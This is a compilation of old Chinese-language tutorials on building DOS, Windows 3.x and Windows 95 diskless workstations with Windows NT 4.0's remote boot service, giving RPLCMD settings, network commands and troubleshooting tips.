    (１)将A:\NDIS\DOS\ETHNE.DOS拷到D:\WINNT\RPL\BBLOCK\NDIS文件夹内。
    (２)在D:\WINNT\RPL\BBLOCK\NETBEUI下创建子目录ETHNE，并将A:\BOOTROM\NT\DOSBB.CNF拷到D:\WINNT\RPL\BBLOCK\NETBEUI\ETHNE文件夹内。
    (３)将A:\BOOTROM\NT\PROTOCOL.INI拷到D:\WINNT\RPL\BBLOCK\NETBEUI\ETHNE目录内。

    修改文件PROTOCOL.INI的IOBASE和IRQ参数与网卡的设置相符。

    ５、在服务器端建立网卡远程启动数据库
    (１)添加该网卡厂商数据（即网卡的卡号前6位）
    D:\WINNT>RPLCMD
    AdapterBootConfigProfileVenderWksta[Quit]:V
    AddDelEnum:A
    VenderName=0000E8
    VenderComment=AcctonEN1688
    (２)添加该网卡的BootBlock(即启动文件)
    D:\WINNT>RPLCMD
    AdapterBootConfigProfileVenderWksta[Quit]:B
    AddDelEnum:A
    BootName=DOSA
    VenderName=0000E8
    BbcFile=BBLOCK\NETBEUI\ETHNE\DOSBB.CNF
    Allotherparametersareoptional(以下参数为选择性的)
    BootComment=EthernetISA
    WindowsSize=0

    (３)添加该网卡的配置文件（本配置将为模板）
    D:\WINNT>RPLCMD
    AdapterBootConfigProfileVenderWksta[Quit]:C
    AddDelEnum:A
    ConfigName=DOS622X
    BootName=DOSA
    DirName=DOS
    DirName2=DOS622
    FitShared=FITS\dos622.fit
    FitPersonal=FIT\dos622p.fit
    Allotherparametersareoptional(以下参数为选择性的)
    ConfigComment=DOS6.22&EN1688
    DirName3=
    DirName4=

    ６、在服务器端建立Profile(配置文件)来设置远程启动工作站的工作环境
    (１)检查远程启动的配置
    “远程启动管理器→配置→检查配置”
    注：该步操作在安装“远程启动管理器”、添加或删除所支持的操作系统以及自行添加让WINDOWSNT支持的网卡后，必须进行。
    (２)建立远程启动工作站的工作环境配置文件（Profile）
    A.“远程启动管理器→远程启动→新的配置文件”。
    B.在“配置文件名”处设置Profile名称，例如：DOS622EN。
    C.在“描述”处输入对Profile的一些说明文字，例如：DOS622FORACCTON。
    D.在“配置”处选择适当配置，例如：DOS6.22&EN1688。
    E.单击“确定”。

    ７、添加远程启动无盘工作站（可选用以下两种方法之一）
    (１)手工方式
    “远程启动管理器→远程启动→新的工作站”
    依次输入“适配器ID”（即网卡号）、“工作站名”、“描述”、“密码”，并选择“配置类型”和“配置文件中的Wksta(即工作站所用的Profile文件)"。
    (２)自动方式（在得不到远程启动工作站网卡号时）
    A.打开远程启动工作站。
    B.在远程启动服务器端启动“远程启动管理器”，发现步骤A产生的不完整记录。
    C.选择该不完整记录。
    D.按“远程启动管理器→远程启动→转换适配器”进行转换。余下步骤同手工方式。

    ８、启动刚刚建立的无盘工作站并进行登录
    完成以上1~7步骤内容，现在就可以启动远程无盘工作站了。当然你还可以继续添加多个工作站，如果再添加的无盘工作站环境与第一个无盘工作站相同，无须再重新配置Profile文件；注意如果你的工作站网卡本来在WINDOWSNT所支持硬件的列表内，你无须进行4~6步骤。

    二、中文版WINDOWS3.1~3.2无盘工作站的创建
    1、将中文版WINDOWS3.1~3.2安装到远程启动的服务器（NT401）内
    (１)启动一个远程无盘的MS-DOS工作站，并以具有系统管理员权限（Administrator）的用户身份登录。
    (２)如果该工作站没有软驱或CD-ROM可供安装使用，请将有软盘驱动器或CD-ROM的工作站或服务器上的该类设备设为共享（可利用netshare命令或其它方法）。在执行安装的工作站上连接共享的软盘
    驱动器或CD-ROM设备（可用netuse命令）。如果该工作站有自己的软驱或CD-ROM，则无须进行本步骤。
    (３)放入中文版WINDOWS3.1~3.2安装盘（光盘或软盘）。
    (４)执行SETUP/A命令，将WINDOWS安装到C:\WIN文件夹中（实际安装到NT401中的D:\WINNT\RPL\RPLFILES\BINFILES\WIN文件夹内）。

    ２、为无盘工作站安装共享的中文版WINDOWS3.1~3.2
    (１)为要使用中文版WINDOWS3.1~3.2的MS-DOS无盘工作站建立共享的Profile文件，例如：名称为DOS622PW32。
    (２)添加使用上一步（1）中共享的Profile文件的远程启动无盘工作站（方法参见“一”中的“7”）。
    (３)重新启动远程启动工作站，并以具有系统管理员权限（Administrator）的用户身份登录。
    (４)在该工作站上执行：CD\WIN。
    (５)在该工作站上执行：SETUP/N选择Express方式安装（注意：不要选择更新任何存在的Windows）。
    (６)如果安装过程中无法自动修改CONFIG.SYS和AUTOEXEC.BAT，请自行把CONFIG.WIN和AUTOEXEC.WIN两个文件中的内容分别拷到CONFIG.SYS和AUTOEXEC.BAT两个文件中。
    （7）修改C:\WINDOWS\SYSTEM\SYSTEM.INI的[386enh]区段内：
    TimerCriticalSection=5000
    UniqueDosPSP=True
    PSPIncrement=2
    (８)如果要使所有使用该Profile文件的无盘工作站能访问到远程启动服务器（NT401）内的WINDOWS,请执行如下操作：
    XCOPY/EC:\WINDOWS\*.*C:\WKSTA.PRO\WIN
    如果远程启动服务器（NT401）中该份中文版WINDOWS3.1~3.2为某工作站专用，无须进行该步操作。

    (９)重新启动该工作站并在登录后，执行WIN即可进入中文版WINDOWS3.1~3.2环境。

        三、中文Windows95无盘工作站的创建
    １、在远程启动服务器（NT401）端准备W95BB.CNF文件
    (１)将D:\WINNT\RPL\BBLOCK\NETBEUI\ETHNE\DOSBB.CNF文件复制到同一文件夹下W95BB.CNF。如果在D:\WINNT\RPL\BBLOCK\NETBEUI下没有其下级子文件夹ETHNE及文件DOSBB.CNF，请先执行“一、4、（2）”步骤。
    (２)修改W95BB.CNF文件（可用任何文本编辑器进行），将EXEBBLOCK\I13.COM~~~改为EXEBBLOCK\W95I13.COM~~~。

    ２、在远程启动服务（NT401）器端建立Windows95远程启动网卡数据库
    (1)添加该网卡的BootBlock(即启动文件)
    D:\WINNT>RPLCMD
    AdapterBootConfigProfileVenderWksta[Quit]:B
    AddDelEnum:A
    BootName=W95AC
    VenderName=0000E8
    BbcFile=BBLOCK\NETBEUI\ETHNE\W95BB.CNF
    Allotherparametersareoptional(以下参数为选择性)
    BootComment=EthernetISA
    WindowsSize=0

    (２)添加该网卡的配置文件（本配置可做为模板）
    D:\WINNT>RPLCMD
    AdapterBootConfigProfileVenderWksta[Quit]:C
    AddDelEnum:A
    ConfigName=W95AC
    BootName=W95AC
    DirName=DOS
    DirName2=WIN95
    FitShared=FITS\win95.fit
    FitPersonal=FIT\win95p.fit
    Allotherparametersareoptional(以下参数为选择性的)
    ConfigComment=PW95&EN1688
    DirName3=
    DirName4=

    (３)执行“启动远程管理器→配置→检查配置”操作

    ３、安装SBS服务器（Server-BasedSetup）,即共享的中文Windows95所在的远程启动服务器或网络上其它的计算机，本文所选用的SBS服务器就是远程启动服务器（NT401）本身。
    （１）在SBS服务器（NT401）上建立用来保存中文Windows95的文件夹，例如：D:\WINNT\PWIN95，并将其设为共享，共享名称为PWIN95（使用该份的所有用户具有只读权限，而Administrators具有完全控制权限）。

    （２）利用一台一般的中文Windows95工作站以具有Administrators权限的用户身份进行登录。
    （３）将中文Windows95光盘放入到该工作站CD-ROM或本工作站已经连接的其它工作站或服务器上的CD-ROM。
    （４）在中文Windows95下执行该光盘的Admin\Nettols\Netsetup文件夹下的Netsetup.exe。
    （５）出现“服务器端安装”对话框时，选择“设置路径”按钮。
    （６）出现“服务器路径”对话框时，输入SBS服务器（NT401）上要保存中文Windows95文件的路径即步骤（1）创建的PWIN95子文件夹，例如：\\NT401\PWIN95。
    （７）单击“安装”，选择“安装规则”的“服务器”并同时指定中文Windows95所在的CD-ROM中的路径，完成中文Windows95的文件向SBS中（复制到步骤（1）中设定的存放中文Windows95文件夹，即PWIN95中）的复制。
    （８）在远程启动服务器（NT401）端，将WINDOWSNT4.0光盘放入CD-ROM，并切换到Clients\Rpl\Update\Win95目录下（当然你的光盘Clients下的所有内容可能已经全部安装到远程启动服务器（NT401）的硬盘上，这样
    就无须使用WINDOWSNT4.0光盘了。）。
    （９）执行步骤（8）中所述文件夹中的Win95srv.bat批处理文件以更新SBS服务器（NT401）中刚安装的中文Windows95的文件，使该中文Windows95具备提供远程启动功能。（注：该文件要在网络命令方式下执行）。

    例如：Win95srv.bat\\NT401\PWIN95（SBS上中文Windows95所在的路径)。
    （１０）在远程启动服务器(NT401)上启动“远程启动管理器”，并执行“配置→检查配置”。

    ４、安装第一台中文Windows95无盘工作站
    （１）在远程启动服务器（或SBS或网络上其它计算机）上建立机器目录（MachinesDirectory）并将其共享:
    MKDIRD:\RPLMACHINES
    NETSHAREMACHINES=D:\RPLMACHINES
    (也可以采用其它方法来完成本步骤操作)

    （２）从一台已经成为MS-DOS6.22远程启动的无盘工作站，以具有系统管理员权限的用户身份登录到主域。
    （３）将该工作站的时间设置成与远程启动服务器及SBS服务器（本文所选用的SBS服务器就是远程启动服务器本身）的时间同步。
    NETTIME\\NT401(远程启动的计算机名称或SBS服务器名称)/SET
    （４）连接SBS服务器上存放中文Windows95的目录和机器目录。
    NETUSEF：\\NT401\PWIN95
    NETUSEG：\\NT401\MACHINES
    （５）切换到F：并执行SETUP/T：G:\WORK1.TMP。
    （６）在安装过程中进行如下操作：
    A．出现“Server-BasedSetup"对话框时，选择“SetupWindowstorunfromanetworkserver"。
    B．出现“StarupMethod”对话框时，选择“StartWindowsfromthenetwork(remotebootserver)”。
    C．出现“MachineDirector"对话框时，输入MachineDirector所在的路径，例如：G:\work1。
    D．出现“SetupOptions"对话框时,选择“Custom"。
    E．出现“AnalyzingYourComputer"对话框时,选择“No,Iwanttomodifythehardwarelist"。
    F．出现“SelectComponents"对话框时，清除“通信”选项（如果该工作站没有Mode）。
    G．出现“NetworkConfiguration"对话框时,选择适当的网卡及通信协议，（网卡配置要正确，通信协议要用NetBUIT）。
    H．出现“Identification"对话框时，确认“Workgroup"的设置与SBS服务器及机器目录（MachineDirectory）属于同一Workgroup或Domain（主域）。
    （７）在远程启动服务器（NT401）端，为该工作站建立新的WINDOWS95配置(Profile)文件，名称为W95AC（参见一、6（2））并选用W95&EN1688网卡配置。
    （８）在远程启动服务器（NT401）端，执行D:\WINNT\Rpl\Bin\Win95clt.bat。
    在WINDOWSNT命令状态下：
    Win95cltD:\RPLMACHINES\\NT401\W95AC
    （９）在SBS服务器（本文中与远程启动服务器为同一台计算机）上修改Machines.ini文件，添加：.

    [0000E8xxxxxx]
    SYSDATPATH=g:\work1
    G=\\NT401\MACHINES
    注：xxxxxx为网卡的后几位

    （１０）重新启动该中文Windows95无盘工作站，完成安装操作。

    ５、安装其它中文Windows95无盘工作站
    （１）如果其它的无盘工作站的配置（无盘工作站网卡的型号以及IRQ和I/O）与第一台中文Windows95无盘工作站相同，按如下步骤进行：
    A．启动一台将要被设置成中文Windows95无盘工作站的MS-DOS622无盘工作站。
    B．以下操作步骤同三、3、（2）~（6）。
    C．选择“机器安装目录”的“添加”按钮。
    输入计算机名称：PW95S2（可以任意给定）
    输入通往机器目录的路径（指当前的）：\\NT401\MACHINES\WORK1
    输入现有机器目录的路径（指当前的）：\\NT401\MACHINES\WORK2
    E.启动远程启动服务器（NT401）端“远程启动管理器”并修改该远程无盘启动工作站的记录，使其选用同第一台中文Windows95无盘工作站相同的配置文件（Profile）。
    F.在SBS（NT401）上修改Machines.ini文件，添加如三、4、（9）中的相似的内容，注意网卡号应为第二台中文Windows95无盘工作站的网卡号，并且SYSDATPATH=G:\work2。
    G.重新启动该中文Windows95无盘工作站，完成安装操作。
    （２）如果其它的无盘工作站的配置与第一台中文Windows95无盘工作站不同，按安装第一台中文Windows95无盘工作站的步骤（三、4）进行。

    综述，利用WindowsNT的远程启动功能（BOOTROM）创建各种无盘工作站，虽然能够达到前言中所述的功能，但实际应用中运行速度比较慢，这同网卡的总线结构、网络的带宽有关，再有同无盘工作站
    端的内存也有很大关系，在本文的安装实验中无盘工作站端的内存采用了16M，总的来讲中文Windows95无盘工作站的运行效果同一般的中文Windows95工作站相比较还不太理想，并且远程启动服务器的工
    作负荷比较重。另外，在各种无盘工作站的安装中，可能还会存在一些具体问题使安装不顺利，例如：你的中文Windows95光盘中可能不存在Netsetup.exe文件等，只要耐心思考是完全能解决的。最后，千万
    要记住--无盘工作站的网卡一定要有支持WINDOWSNT远程启动功能的BOOTROM芯片，否则本文所述就无从谈起。

返回

www.163164.com 下载《一键清理系统垃圾》，保持系统的“苗条”身材与运行速度！


创建100M无盘站

《一键清理系统垃圾》

创建100M无盘站

    以Win95 10M无盘工作站构成的局域网，应用越来越广泛。学校和各种培训机构都开始使用无盘机。这种无盘工作站局域网，减少了设备安装的经费支出和病毒的传播，而且有利于各种应用软件集中管理、减少网络管理员维护工作的时间与负担。不过很多应用软件往往要求工作站与服务器的硬盘之间大量地交换数据，使得10M局域网负荷过重。多媒体教学软件及CAI课件就无法在Win95无盘工作站上正常运行。为此，经反复实验，我们在 Windows NT和Win95 10M无盘工作站的基础上成功地建立了Win95 100M 无盘工作站。几十台工作站不仅能同时正常运行各种多媒体教学软件或CAI课件，而且能够观看VCD教学片，也可方便地将无盘工作站接入 Intranet和Internet。

    一、准备工作

    安装Windows NT 10M无盘工作站必须选用支持NT远程启动的网卡。在众多的网卡中，Novell NE 2000网卡前六位数字为004003和004095，该网卡可直接支持NT远程启动。如果你选用的网卡是市面上常见的TP－Link RTL8019 10M ISA网卡，这种网卡可通过随卡自带的驱动程序Pg9008.exe修改前六位数字为004003和004095，那么你就可以忽略在DOS6.22下添加网卡和在Win95下添加网卡两部分内容。Windows NT 远程服务不支持100M PCI网卡，在添加TP－Link TF－3239P 100M PCI网卡时，既要在DOS6.22和Windows 下添加网卡，又要建立配置文件（Profile），也还要为建好的配置文件建立新的工作站。
    假设Windows NT安装在C:\Winnt目录下，工作站网卡（RTL8019）I/O=300，IRQ=3,BOOTADRESS=C800，其卡前六位为004003。
    1.通过“控制面板→网络→添加→协议”添加DLC通讯协议。
    2.通过“控制面板→网络→添加→服务”添加“远程启动服务”。
    3.通过“控制面板→服务”激活“服务”对话框，在“启动类型”选项中选“自动”，再单击“确定”即可。

    二、NT下10M ISA网卡Win95无盘工作站的建立

    1.DOS6.22无盘工作站的建立
    将DOS6.22的全部文件复制到C:\ WINNT\RPL\RPLFILES\BINFILES\DOS622下，并解除IO.SYS和MSDOS.SYS的隐含属性。
    启动“远程启动管理器”，使用Windows NT自带DOS下添加网卡的数据，建一个新的配置文件（Profile）如ISADOS,并且执行“检查配置”和“修复安全性”。
    启动一台无盘工作站（带有BOOT ROM芯片），若一切正常，在“远程启动管理器”中点击“刷新”后，就会出现该无盘工作站“网络内部号码”。选中它，在File中建“转换适配器”，给该工作站取好相应的名字后，用刚才新建立的配置文件（Profile） ISADOS,击“确定”，你会发现，该工作站开始启动，并引导DOS6.22。
    2.Win95 无盘工作站的建立
    建立Win95无盘工作站的前提是建好DOS无盘工作站，然后通过一台Win9x的有盘工作站安装Win95 SBS服务器。
    1）在NT服务器上建共享目录Win95sbs，用于保存公共文件，并另建一共享目录Machines,用于保存每台无盘工作站的私有文件。
    2）登录一台普通的Win9x工作站，将Win 95安装光盘放入光盘驱动器中，执行ADMIN\NETTOOLS\NETSETUP\NETSETUP.EXE，将Win 95的文件安装到\\NTS4\WIN95SBS中（其中NTS4为服务器名）。按缺省值安装即可。
    3）将Windows NT 4.0安装光盘放入服务器的光盘驱动器中执行CLIENTS \RPL\UPDATE\WIN95下的Win95srv.bat补丁程序，此步骤使Win95sbs中的文件具有网络安装功能。
    4）启动一台DOS无盘工作站，开始进行Win95无盘工作站的正式安装,依次键入以下命令：
    C:\〉NET TIME \\NTS4\SET\Y
    C:\〉NET USE F:\\NTS4\WIN95SBS
    C:\〉NET USE G:\\NTS4\MACHINES
    F:\〉SET / T: G:\CLIENT1
    5）待安装完毕,要求重新启动计算机后,关闭DOS无盘工作站。
    6）启动“远程启动管理器”，使用Windows NT自带Win95下添加网卡的数据，建立一个新的配置文件（Profile）如ISAWIN，并且执行“检查配置”和“修复安全性”。在RPL\BIN下执行：
    Win95clt \\NTS4\MACHINES\CLIENT1 \\NTS4 ISAWIN
    修改Machine.ini文件，更换原有无盘工作站的属性中的配置文件为ISAWIN。将声卡、显卡以及其它无盘工作站外设所需的驱动程序拷入WIN95SBS\SYSTEM子目录中，并解除inf文件的隐含属性。
    7）启动刚才关闭的无盘工作站，进入Win95安装界面，按照屏幕提示“指明”一些pnp设备的安装路径或pnp设备的安装。这时会出现IE错误，并要求重新启动，这是正常情况。
    8）重新启动，继续进行Win95安装，这一次就会安装成功，重新启动，便进入Win95界面。
    9）在Win95中，将C:\COMMAND.COM拷入G:\CLIENT1，再进行其它一些外设的安装，到此安装Win95无盘工作站结束。
    3.NT 4.0下PCI 100M网卡Win95无盘工作站的建立
    PCI 100M网卡Win95无盘工作站必须在ISA 10M网卡Win95无盘工作站建立好的基础上进行。
    1）首先建立好PCI 100M网卡（TF－3239P）DOS、Win 95两个配置文件（Profile）为PCIDOS、PCIWIN。
    2）在建立好Win95无盘工作站上，加入一块PCI 100M网卡，不装BOOT ROM芯片。
    3）将PCI网卡的Win95驱动程序中的.inf文件拷入WIN95SBS\inf目录下；将.sys文件拷入WIN95SBS\SYSTEM目录下；将.dos文件拷入WIN95SBS\目录下。
    4）重新启动Win95无盘工作站，完成对PCI网卡的配置，当PCI网卡安装成功后，才能进行下面的步骤。
    5）重新启动Win95无盘工作站，按“F8”键，进行单步执行状态。注意Win.com不执行，打入“N”后，转到机器目录所在的盘符，利用注册表编辑器编写SYSTEM.DAT，如：
    G:〉CD CLIENT1
    G:\CLIENT1〉CD SUBOOT
    G:\CLIENT1\SUBOOT〉REGEDIT /L:SYSTEM.DAT /EREGISTRY.TXT (导出注册表)
    G:\CLIENT1\SUBOOT〉EDIT REGISTRY (编辑注册表)
    将NE2000.DOS (或PNPND.DOS，ISA网卡的驱动程序)改为RTSND.DOS (TF－3239P PCI网卡的驱动程序)
    G:\CLIENT1\SUBOOT〉REGEDIT /L:NSYSTEM.DAT /C REGISTRY.TXT (导入注册表)
    G:\CLIENT1\SUBOOT〉ATTRIB NSYSTEM.DAT －S－R－H （解除NSYSTEM.DAT的属性）
    6）在服务器上修改SUBOOT子目录中的Profocol.ini文件，并将MS2000改为RTSND，删除“Interrupt=3”和“IOBase=05300”。执行远程启动服务器上的RPL\BIN\Win95clt.bat文件：
    C:\WINNT\RPL\BIN\Win95clt.bat \RPLMACHINES\CLINET1 \\NTS4\WIN95SBS
    修改Machine.ini文件，建立100M PCI网卡Win95无盘工作站的配置文件为PCIWIN。
    7）从机器里拔出ISA网卡，将BOOT ROM芯片插入TP－3239P网卡。
    8）重新启动Win95无盘工作站，出现NE2000网卡错误信息，删除NE2000网卡驱动程序，再重新启动，到此，安装完毕。

    三、遇到的问题及解决办法

    1. 在步骤1中，出现“远程启动服务”不能启动，请首先检查网卡端口是否配置正确、工作是否正常。其次检查是否以前安装过RPL，如果以前安装过RPL，那么再次安装时，如果不删除以前的RPL，则会出现不能启动“远程启动服务”的错误。
    2. 正确选择Win95光盘，一般的随机版或OEM版的Win95，不能在NT服务器上安装 Win95的共享文件。早期的升级版，缺少3个安装文件。因此，必须正确选择Win95的完整版。
    3. 当显卡、声卡驱动程序无法直接在工作站上安装，事先可以考虑将驱动程序拷贝到NT服务器SBS目录下system子目录中去，然后采用硬件检测自动安装。

返回


多媒体无盘站巧实现

《一键清理系统垃圾》

多媒体无盘站巧实现

    目前，Win 95无盘工作站在各类学校普遍存在。为了减少开支，工作站通常都没有安装光盘驱动器(CD－ROM)和声卡，但在多媒体软件大行其道的今天，这显然使工作站的整体性能大打折扣，因为这些无盘工作站都无法运行多媒体软件。
    其实我们可以依靠网络及软件的优势，“软”、“硬”兼施地对工作站进行技术改造，以极少的投入使工作站的性能产生质的飞跃，把普通电脑变成多媒体电脑，方法如下：
    1、网络服务器光驱共享
    网络服务器上的光盘驱动器(CD－ROM)，是网络中一个重要的硬件资源，应该把它设置为供所有工作站共享。这样，就可以把诸如《开天辟地》之类的入门性多媒体教学光盘放在网络服务器上供所有工作站使用。在工作站端只需简单地把服务器上的CD－ROM映射为某个盘符即可使用，如E盘。
    2、给各工作站安装软声卡驱动程序，使机内喇叭模拟声卡发声
    这个驱动程序可以在《金山影霸Ⅱ》中找到，该软件文件夹中会有一个名为Sthaudio的子文件夹，运行这个文件夹中的Setup.exe，系统就会自动把SthAudio.Drv和SthAudio.386这两个文件复制到Windows安装文件夹下的System子文件夹中，并自动修改Windows系统的system.ini文件，加入如下语句：
[driver]
Wave=SthAudio.Drv
:
:
[386Enh]
DEVICE=SthAudio.386
    无盘工作站安装时，系统会自动修改System.ini文件，但由于找不到Windows 95的System子文件夹，因而并不会把SthAudio.Drv和SthAudio.386这两个文件复制到System文件夹中，而需要由系统管理员人工地把这两个文件复制到网络的Windows 95共享目录的System文件夹中(只需复制一次)，以后各工作站只要按上述办法运行Sthaudio文件夹中的Setup.exe，就能驱动机内喇叭发声了。
    声音效果如何？对于运行一般的多媒体教学光盘来说，还是可以的。不过，如果机房内不够安静，或者有比较多的机器同时使用多媒体教学光盘，相邻的机器会互相影响，导致听不清声音。
    3、给工作站加装一个耳机插孔
    耳机插孔单价约1元，建议安装在机箱面板上，以方便拔插耳机。当插入耳机时，声音转到耳机上输出，利用耳机来监听声音(耳机由使用者自带)，就不会相互影响了。

返回


快速安装Windows 95无盘工作站

《一键清理系统垃圾》

快速安装Windows 95无盘工作站

    由于局域网环境中无盘工作站拥有易于管理、节省支出、防止病毒等优点，因此它在网络教室、网吧及一些公司的局域网中的应用日益广泛。关于其安装方法，有着众多的资料介绍，均有不同，令人无从下手。本文将介绍如何进行Windows 95 for NT的快速安装及一些常见故障的排除。安装过程已经笔者的严格验证。
    基本环境要求：
    软件：
1. MS-DOS Ver6.22
2.Windows 95升级版，需要在\ADMIN\NETTOOLS\NETSETUP目录内含NETSETUP.EXE
3. Windows NT 4.0 Server中文版
4. 网卡驱动程序盘，支持NT远程启动
    硬件：
     1. 服务器安装NT，含网卡
2. 有盘工作站带CD-ROM，我们选用联想奔月1000
3. 无盘工作站，我们选用联想双子明星
4. 集线器或交换器
5. 支持NT远程启动的网卡, 我们选用D-Link公司的DE-220TP卡
6. UTP连接线缆

    一、准备工作

    1. 确认无盘工作站上已经配齐了带有BOOT ROM的网卡。
    2. 运行网卡SETUP程序，如果网卡是PnP（Plug and Play，即插即用）类型的，请务必将其PnP功能关闭（DISABLE）；必须开启（ENABLE）其BOOT ROM功能。
    3. 在服务器上安装中文Windows NT Server 4.0。在以下步骤中，假设您将中文Windows NT Server 4.0安装在服务器的\WINNT目录下，服务器名为LX。
    4. 在有盘计算机上安装DOS 6.22和中文Windows 95，做成基于Windows NT服务器的Windows 95有盘工作站。
    5. 服务器端设置，在服务器网卡安装成功的基础上，添加“NETBEUI”和“DLC”网络协议。并安装远程启动服务，输入安装源路径，完成后，在【远程启动服务】内“启动”本功能，并设置为自动，保证每次启动服务器均能启动该服务。

    二、 建立无盘站DOS启动系统

    第一步：
    首先在服务器设置无盘站启动环境，制作一张至少包含下列文件IO.SYS 、MSDOS.SYS、COMMAND.COM、HIMEM.SYS的MS-DOS 6.22启动盘，并去掉IO.SYS和MSDOS.SYS两个文件的“系统（-S）”和“隐含（-H）”属性，建立“\WINNT\RPL\RPLFILES\BINFILE\DOS622”目录，并将文件复制到该目录下，建立“\WINNT\RPL\BBLOCK\NDIS”目录，并将网卡驱动盘上的DE22X.DOS文件复制到本目录下，建立“\WINNT\RPL\NEIBEUI\DE220”目录，并将上级目录“NE2000”下的DOSBB.CNF、W95BB.CND、PROTOCOL.INI文件复制到本目录下，将三个文件中所有的“NE2000”更改为“DE220”。
    第二步：
    建立DOS无盘站的开机环境配置，执行如下操作。
    CD \WINNT\rpl 〈Enter〉
    RPLCMD 〈Enter〉
    执行如下操作（划线部分为输入内容）
    适配器引导Config配置文件服务代理商Wksta[退出]: B
     ADD DEL ENUM:A
BOOTNAME=DOS_DE220
VENDORNAME=0080C8 (网卡地址的前6位)
BBCFILE=bblock\netbeui\de220\dosbb.cnd
所有其他参数都是可选的
BOOTCOMMENT= DE220 FOR DOS6.22
WINDOWSIZE=0x0
    适配器引导Config配置文件服务代理商Wksta[退出]: C
ADD DEL ENUM:A
CONFIGNAME=DOS_DE220CN
BOOTNAME=DOS_DE220 (与前一步相同)
DIRNAME=dos
DIRNAME=dos622
FITSHARED=fits\dos622.fit
FITPERSONAL=fits\dos622p.fit
所有其他参数都是可选的
CONFIGCOMMENT=DE220 FOR DOS6.22
DIRNAME3=
DIRNAME4=
    适配器引导Config配置文件服务代理商Wksta[退出]: V
ADD DEL ENUM:A
VENDORNAME:0080C8
所有其他参数都是可选的
VENDORCOMMENT:DE220 NIC
    第三步：
    建立DOS远程启动用户，从【远程启动】菜单中选择【新的配置文件】，在“配置文件名”输入框中输入要生成配置文件的名字，如：DE220 NIC FOR DOS，在“配置”下拉列表框中添加网卡配置，即第二步中ConfigComment行中输入的DE220 FOR DOS6.22，“描述”项可以省略。此时开启一台无盘工作站，出现引导等待状态。然后在【远程启动管理器】中从【查看】中选择【刷新】，正常情况下那台已开启工作站的网络记录将显示出来，选定该记录，再选择【远程启动】中的【转换网卡】，在“Wksta”处输入该工作站的名称，再选择“添加”。此时应该看到这台DOS无盘工作站已经运行起来，可以进行DOS环境下的各种操作了。

    三、建立无盘站Windows 95系统

    第一步：
    在服务器建立“\SBSFILES”(放置Windows 95无盘工作站的共享文件)和“\CLIENTS”(放置各Window)目录并设为共享属性。启动安装Windows 95的有盘工作站，保证能够在“网络邻居”内看到刚才建立的共享目录，将Windows 95升级版光盘放进光驱，运行光盘中“\ADMIN\NETTOOLS”目录中的“NETSETUP”，即可进入Windows 95“基于服务器的安装”，选择“安装”，在“服务器路径”处输入“\\LX\SBSFILES”后，选择“安装”，其“安装策略”为“服务器”项，“源路径”为Windows 95安装盘的路径，选择“不创建默认值”，“产品标识”为合法的CD号码。接下来将NT安装盘放入服务器光驱，在“MS-DOS”方式下运行下列命令，复制Windows 95的更新文件：
    CD \CLIENTS\RPL\UPDATE\WIN95
    WIN95SRV G:\SBSFILES
    将DE220.DOS复制到“G:\SBSFILES”下，准备进行Windows 95无盘站的安装。
    第二步：
    启动无盘工作站，进入无盘站的DOS环境，将服务器和无盘工作站的时钟和时间同步，使用“NET TIME \\LX /SET”命令，然后使用下列命令：
    NET USE F:\\LX\SBSFILES 〈Enter〉
    NET USE G:\\LX\CLIENTS 〈Enter〉
    F: 〈Enter〉
    F:SETUP /T:G:\CLIENT.SET 〈Enter〉
    下面进行工作站Windows 95的安装。如果屏幕上的信息没有说明，则自行选择或使用默认值安装，在选择“Hareware Types”项目中配置“CD-ROM驱动器”、“端口”、“网络适配器”、“声音、MIDI或视频捕捉卡”，在“Network Configuration”中选择“Novell/Anthem”公司的“NE2000 Compatible”网卡，在属性画面中更改正确的中断和地址，然后输入正确的计算机名称和工作组，需要TCP/IP的，可以一起设置。
    第三步：
    建立Windows 95的开机环境。在服务器的“MS-DOS命令提示符”画面运行“\WINNT\RPL\RPLCMD”命令进行配置。
    适配器引导Config配置文件服务代理商Wksta[退出]: B
ADD DEL ENUM:A
BOOTNAME=WIN95 DE220
VENDORNAME=0080C8 (网卡地址的前6位)
BBCFILE=bblock\netbeui\de220\w95bb.cnd
所有其他参数都是可选的
BOOTCOMMENT= Windows 95 FOR DE220
WINDOWSIZE=0x0
    适配器引导Config配置文件服务代理商Wksta[退出]: C
ADD DEL ENUM:A
CONFIGNAME=WIN95 DE220CN
BOOTNAME=WIN95 DE220 (与前一步相同)
DIRNAME=dos
DIRNAME=WIN95
FITSHARED=fits\win95.fit
FITPERSONAL=fits\win95p.fit
所有其他参数都是可选的
CONFIGCOMMENT=Windows95 FOR DE220
DIRNAME3=
DIRNAME4=
    建立新的配置文件，从【远程启动】菜单中选择【新的配置文件】，在“配置文件名”输入框中输入要生成配置文件的名字，如：WIN95 CONFIG，在“配置”下拉列表框中添加网卡配置，即第二步中ConfigComment行中输入的“WIN95 DE220CN”，“描述”项可以省略。将Windows 95工作站所特需的实模式，也被称为MS-DOS7.0启动文件复制到服务器的“\WINNT\RPL\RPLFILES\PROFILES”目录下，方法是首先进入“\WINNT\RPL\BIN”目录下，运行“WIN95CLT 〈Win95安装路径〉 \\LX WIN95DE220CN”系统提示文件被成功复制。修改“\\LX\SBSFILES\MACHINES.INI”文件内容如下：
    [0080C8XXXXXX] （启动工作站网卡 MAC ADDRESS）
    SYSDATPATH=G:\CLIENT01 （Windows 95 的安装路径）
    G=\\LX\CLIENTS
    完成后设置Windows 95的启动环境，在【远程启动管理器】中选择【配置（C）】中的【检查配置】，选择【是（Y）】，再选择【修复安全性(S)】，选择【是（Y）】，然后选择【远程启动】中的选择【属性】，在“远程启动工作站属性”画面，在“配置文件中的Wksta(P):”栏目，选择前面设置的配置文件名，然后选择【确定】，重新启动工作站，输入用户名及口令，便可成功进入Windows 95系统。
    第四步：
    多台工作站的安装可以重复上面的步骤，逐一进行安装，也可通过下面的方法进行快速安装。这里省略设置网卡等步骤，在有盘工作站上运行“\admin\nettools\netsetup”，在“基于服务器的安装”输入SBS服务器的路径，如“\\lx\sbsfiles”，选择【添加】，在“设置多个机器”中输入包含计算机名和机器目录列表的文件名，如“MACHINES.TXT”，再在该文件中增加相应工作站的网卡地址及安装目录。完成后重新启动工作站，通过【远程启动管理器】进行其他工作站的管理。至此已经完成Windows 95无盘工作站的安装。

    四、常见故障处理

